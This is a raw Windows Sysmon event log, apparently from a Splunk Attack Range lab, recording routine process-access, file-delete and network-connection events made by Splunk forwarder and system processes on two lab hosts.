07:55:36.489{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082307Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:36.489{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082306Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:36.489{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082305Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:36.489{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082304Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:36.489{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082303Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:36.489{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082302Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:36.489{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082301Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:36.489{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B378-615A-6A01-00000000FD01}2568C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082300Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:36.489{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082299Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:36.489{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B378-615A-6A01-00000000FD01}2568C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082298Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:36.490{2FDD8D40-B378-615A-6A01-00000000FD01}2568C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082297Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:36.099{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F20183D430C0BF9C9FCD372D364CC28,SHA256=323F4F754764E473C43EB1F030D2D9B46EECD5AA9D65FB8F7174D387D158F22C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082296Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:36.099{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3554DCB93F155F5F8923349555215316,SHA256=0C2CAF191B46DD63A1E18E93408824B66A966FB7BE11A3962D9C37BF18F90AE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104391Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:37.847{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=582E4BE38DC9981B7A87F855C1C54A1F,SHA256=6FCD545F74789C762DAFA480A5EB7F0C4F8AB764D31E54F077D0F00BF73DC239,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082313Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:37.489{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1CEC6D47CA806151C9AA0CC0AEB18FC2,SHA256=973300D7A00EA79D1A202C23D00E4C85BCD4728442D4087B9D43E54D0F03AAB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104392Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:38.847{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F067F91FDC1900CA832F2D51E77FB7C,SHA256=48323E7C74E8A53115E921B693098E67934CA04298B9A0E33E84415615D5D0A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082314Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:38.036{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=849F144B2A5852944E1167CD9D2C37CA,SHA256=BB4620E367DF184A22A070D6323BD421F4CD4A3799CE6D4F7D3E0113F2866176,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104394Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:39.862{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42D23AFD0B1BBA7D344BAA8A6D2CD61F,SHA256=23E2AF6FF949F490C2245218A4B1CD9DB455B78147A3A4AB72EE3988D40BD3D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082315Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:39.052{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F61A0728F4087707E79F98A83190884E,SHA256=BFDAE26C7DA144B64714D64E63A792C7443D96BC556AC18890FE15B4B1273D8A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104393Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:38.322{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49597-false10.0.1.12-8000- 23542300x8000000000000000104395Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:40.878{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D596A54102BD6E02AADD288CD85ACFDF,SHA256=D568DE1E6E6D0D687B8C103DD83789459907FA9837A51C883EE8B03F2042573A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082316Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:40.068{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B5E9391A40B05D513B998CE949D6F3F,SHA256=FB614E532B3CA1ADA14A33AD2DE6A7C61D3C408556130047B0CAF50E45EEA563,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104396Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:41.893{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA95A17E05AC08650A9BFD6A3CEDB945,SHA256=2408C49DDB852A384C0FAABBEB9F9A890B033487AB23524A8B7D19827CA74EF0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082318Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:38.652{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50087-false10.0.1.12-8000- 23542300x800000000000000082317Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:41.068{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFE1D574983E1270981415A6B37B3EB8,SHA256=EF08F0EDFA8A0FF152C5DA23843D67AF886E927477E387090AFC4AF22D93F170,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104397Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:42.893{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57893925BD0094D4485F4E450A0D4D53,SHA256=46A1624C12F10F9D1153F8CF71F3EB3FF102C8DCE43226F1A90BF01E20DF8E63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082319Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:42.161{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=316FC4DCB1ED10D07C537D3F50114D87,SHA256=E18A2D3A8FFF6B7F3D2C05D81D835F5B41B746C86289461AAFB1F83F787E3558,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104398Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:43.893{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CCDD8F280F5AE39E1DFE36E5C27B9B7,SHA256=57E64E1DEA926E4DF7562885A5610FE4A32101A0EA02A958E38B5CDB4A3CEE1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082320Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:43.255{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C502F5A0217E055DEAB1F49AF89EA522,SHA256=00DFD29997FBB29323D5C5A9D0B7587FA6EE4418078FA26492BDA719F81F239E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104400Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:44.925{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D0EF11E1AE28B60E41F2F3335EC0F36,SHA256=E9B621352028709D33E2BEF626DBBE0BE4B05BB9BBE86E9FC8BFAB1D6C63272D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082321Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:44.286{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FCBC6ED3703885A5C720202D2671F4D,SHA256=00803CC4457E6D60B4AA6FBEB75A55B19ED8150789CA5D635C6E2FE1653E7AF5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104399Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:43.416{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49598-false10.0.1.12-8000- 23542300x8000000000000000104401Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:45.940{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51678628D5A6D428DFCABE779C3D4356,SHA256=09C6FAA8F7A5A7875C607BD3E808CBF7872F628831AB85F8530FC2FE1C5DDBAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082322Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:45.302{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B9F8118B922244E6619E0222BC5F2ED,SHA256=47F06680D8984E41E889F1FC18F0C01A299BE6D01C489EA9F11F2E33E14B0961,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104402Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:46.956{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D4D7A740710F3FD11550946E6F44FBE,SHA256=3F8CAD8B2FF50CC36CB020BA21CF7CA82151099CAAEEA6BF3F5E3314633B3BF3,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082324Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:43.684{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50088-false10.0.1.12-8000- 23542300x800000000000000082323Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:46.349{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=643D61DEE7F2F6E1E66A2EF259E13DE9,SHA256=D932EB4567D96E3669A3B7977C6C15A1008F1B7141E921C9957E315C16CF3016,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104403Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:47.987{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6764035667934CC5FDAE5949B62C75D3,SHA256=92B55B96EE054791C993EBC601501E9B0861EB13E08603B06075528BC2CAD4D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082325Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:47.349{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DCE9244D820592FCB55D583E968AB3D,SHA256=751C83E0A2B9EAA4A8A8E6E0E929CD8BBE28B1206C167B6F004794D794216F67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104404Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:48.987{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F43C42B6DC78BDDC28BDE567379F4D0F,SHA256=B09B3DFA850219B493765CBC46941406C550AE15E0DEEDD0FDD82D71013BF795,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082326Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:48.365{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 